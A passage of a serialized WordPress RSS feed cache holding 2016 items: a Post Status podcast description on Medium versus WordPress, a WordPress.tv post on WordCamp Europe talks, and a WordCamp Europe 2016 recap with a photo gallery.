Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=25489\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"https://poststatus.com/medium-wordpress-draft-podcast/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2575:\"<p>Welcome to the Post Status <a href=\"https://poststatus.com/category/draft\">Draft podcast</a>, which you can find <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\">on iTunes</a>, <a href=\"https://play.google.com/music/m/Ih5egfxskgcec4qadr3f4zfpzzm?t=Post_Status__Draft_WordPress_Podcast\">Google Play</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\">Stitcher</a>, and <a href=\"http://simplecast.fm/podcasts/1061/rss\">via RSS</a> for your favorite podcatcher. Post Status Draft is hosted by Joe Hoyle — the CTO of Human Made — and Brian Krogsgard.</p>\n<p>In this episode, Joe and Brian talk about Medium & WordPress and whether Medium and similar platforms are a significant threat to WordPress. They also discuss the benefits and challenges of open source platforms versus proprietary ones, and WordPress’s potential as a lower level item in the site stack.</p>\n<p><!--[if lt IE 9]><script>document.createElement(\'audio\');</script><![endif]-->\n<a href=\"https://audio.simplecast.com/41890.mp3\">https://audio.simplecast.com/41890.mp3</a><br />\n<a href=\"http://audio.simplecast.com/41890.mp3\">Direct Download</a></p>\n<h3>Links</h3>\n<ul>\n<li><a href=\"https://wordpress.tv/2016/06/25/matt-mullenweg-interview-and-qa/\">Interview with Matt</a></li>\n<li><a href=\"http://wordpress.tv/2016/06/30/joe-hoyle-the-ultimate-rest-api-talk-part-1/\">Joe’s REST API talk</a></li>\n<li><a href=\"https://github.com/joehoyle/vienna\">Vienna WordPress app concept</a></li>\n<li><a href=\"https://ma.tt/2015/03/typewriter/\">Billionaire’s Typewriter</a></li>\n<li><a href=\"https://markarms.com/2016/06/23/what-to-consider-when-the-platforms-show-up-with-money/\">What to Consider When the Platforms Show up With Money</a></li>\n<li><a href=\"https://medium.com/\">Medium.com</a></li>\n<li><a href=\"https://developer.wordpress.com/calypso/\">WordPress.com Calypso</a></li>\n<li><a href=\"https://www.alleyinteractive.com/blog/how-medium-became-livejournal-for-publishers/\">Medium compared to LiveJournal</a></li>\n</ul>\n<h3>Sponsor</h3>\n<p>This episode is sponsored by <a href=\"https://pippinsplugins.com/\">Pippin’s Plugins.</a> If you want to sell downloads, setup content restriction, or start an affiliate program, Pippin’s Plugins have you covered. If you need all three, even better. Pippin’s Plugins is well known for making some of the best coded and most reliable plugins in the market. Check out <a href=\"https://pippinsplugins.com/\">PippinsPlugins.com </a>for more information.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 08 Jul 2016 23:28:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Katie Richards\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"WordPress.tv Blog: WordCamp Videos – Copywriting for SEO and improving your site security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"http://blog.wordpress.tv/?p=507\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"http://blog.wordpress.tv/2016/07/08/wordcamp-videos-copywriting-for-seo-and-improving-your-site-security/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1545:\"<h2 class=\"video-title\">Aaron Campbell: Website Security – The Big Picture w/ Simple Steps to Take</h2>\n<p>Security can be complex, intimidating, and even frightening. Don’t let the enormity of it scare you into inaction. Learn what some of the security researchers and security professionals deal with, and then find out some simple steps you can take to secure your sites.</p>\n<p></p>\n<p>More videos from <a href=\"http://wordpress.tv/event/wordcamp-europe-2016/\">WordCamp Europe 2016</a></p>\n<h2 class=\"video-title\">Beyond SEO – Copywriting for professionals – Marieke van de Rakt & Joost de Valk</h2>\n<p>SEO has gone from a technical trade to being more marketing focussed. Joost & Marieke will talk about how to gain great rankings & satisfied visitors by writing good content. Focussing on SEO copywriting has a major pitfall. We give examples and tips on how to write a post that is both readable as well as SEO-friendly.</p>\n<p></p>\n<p><a href=\"http://www.slideshare.net/yoast/beyond-seo-copywriting-for-professionals\">Presentation slides</a></p>\n<p>More videos from <a href=\"http://wordpress.tv/event/wordcamp-europe-2016/\">WordCamp Europe 2016</a></p><br /> <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptvblog.wordpress.com/507/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptvblog.wordpress.com/507/\" /></a> <img alt=\"\" border=\"0\" src=\"http://pixel.wp.com/b.gif?host=blog.wordpress.tv&blog=5310177&post=507&subd=wptvblog&ref=&feed=1\" width=\"1\" height=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 08 Jul 2016 16:29:24 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Jerry Bates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"Post Status: WordCamp Europe 2016, held in Vienna, was a massive success\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=25313\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://poststatus.com/wordcamp-europe-2016-massive-success/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:34867:\"<p>WordCamp Europe 2016 — held in Vienna’s beautiful MuseumsQuartier — was wonderfully executed, and a highlight of the year in WordPress conferences. Organized by a huge team of dedicated volunteers, many of whom worked near full time in the weeks leading up to the events, pulled off the largest WordCamp ever.</p>\n<p>Nearly 2,000 attendees streamed into Vienna for WordCamp Europe, and over the course of two conference days and a contributor day, showed just how diverse and special the WordPress community is.</p>\n<p>There were many great talks, and I unfortunately didn’t get to see near enough of them, but fortunately the team got videos onto WordPress.tv incredibly fast, and you can now watch <a href=\"http://wordpress.tv/event/wordcamp-europe-2016/\">all WordCamp Europe sessions</a> for yourself.</p>\n<p>I had the privilege to take part in the conference in two sessions, first as a moderator of a panel of business owners, on the topic of <a href=\"http://wordpress.tv/2016/06/29/panel-discussion-cultivating-happy-teams-for-better-business/\">cultivating happy teams</a>. I also greatly enjoyed <a href=\"http://wordpress.tv/2016/06/25/matt-mullenweg-interview-and-qa/\">interviewing Matt Mullenweg</a> for the event keynote.</p>\n<p>I really recommend you check out all of the talks and choose those which you may learn from. I have pictures from some of those I attended, as well as from the event in general and contributor day.</p>\n\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-1/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-1-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Emcee\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-2/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-2-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Welcome to WCEU\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-3/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-3-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"WCEU dotmap\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-4/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-4-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"WCEU stage\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-5/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-5-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Mike Little, WordPress co-founder\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-6/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-6-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"The stars of this conference\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-7/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-7-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"John Blackbourn\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-8/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-8-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Rarst\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-9/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-9-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"More Rarst\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-10/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-10-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Remkus de Vries\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-11/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-11-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Simon Dickson\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-13/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-13-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Helen\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-14/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-14-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Siobhan and Benji\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-15/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-15-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Adam Warner\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-16/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-16-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Wapuu coloring book\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-17/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-17-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Joe Hoyle\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-18/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-18-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Joe Hoyle\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-19/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-19-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"MuseumsQuartier\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-20/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-20-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Nacin\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-21/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-21-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"WCEU audience\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-22/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-22-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"More Nacin\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-23/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-23-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Tom Willmot, \" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-24/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-24-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"K.Adam White\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-25/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-25-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"More K.Adam\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-26/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-26-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Sara Rosso, Emcee\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-27/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-27-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Barry\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-28/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-28-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Ivelina\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-29/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-29-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Mike Little\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-30/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-30-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Family friendly\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-31/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-31-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Kari Leigh\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-32/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-32-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"audience\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-33/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-33-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Dancing Jenny\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-34/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-34-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Jenny and Petya handoff\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-35/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-35-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"WCEU organizer transition\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-36/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-36-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Kari Leigh doing her thing\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-37/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-37-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"WCEU organizers\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-38/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-38-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Petya and friends\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-39/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-39-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Hall E+G\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-40/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-40-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Courtyard\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-41/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-41-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Picture of Picture Takers\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-42/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-42-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Goodbye\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-43/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-43-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Robert O\'Rourke\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-44/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-44-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Robert, Sonja, John\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-45/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-45-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Tom & Simon\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-46/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-46-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Probably REST API talk\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-47/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-47-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Winky Japh\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-48/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-48-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Suave Tarei\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-49/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-49-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Bronson\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-50/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-50-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Oh, Ant\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-51/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-51-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Serious Ant\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-52/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-52-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Sneaky K.Adam\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-53/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-53-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Human Made\'s latest\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-54/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-54-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Can\'t get enough Rarst\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-55/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-55-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Shinichi\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-56/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-56-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Matt Mullenweg\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-57/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-57-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Ben May\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-58/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-58-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"masked Petya\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-59/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-59-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Ladies of the ball\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-60/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-60-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Nacin\'s tie\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-61/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-61-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Nacin\'s profile\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-62/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-62-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Nacin\'s satisfaction\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-63/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-63-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Blue steel\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-64/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-64-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Nacin & Matt\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-65/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-65-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" 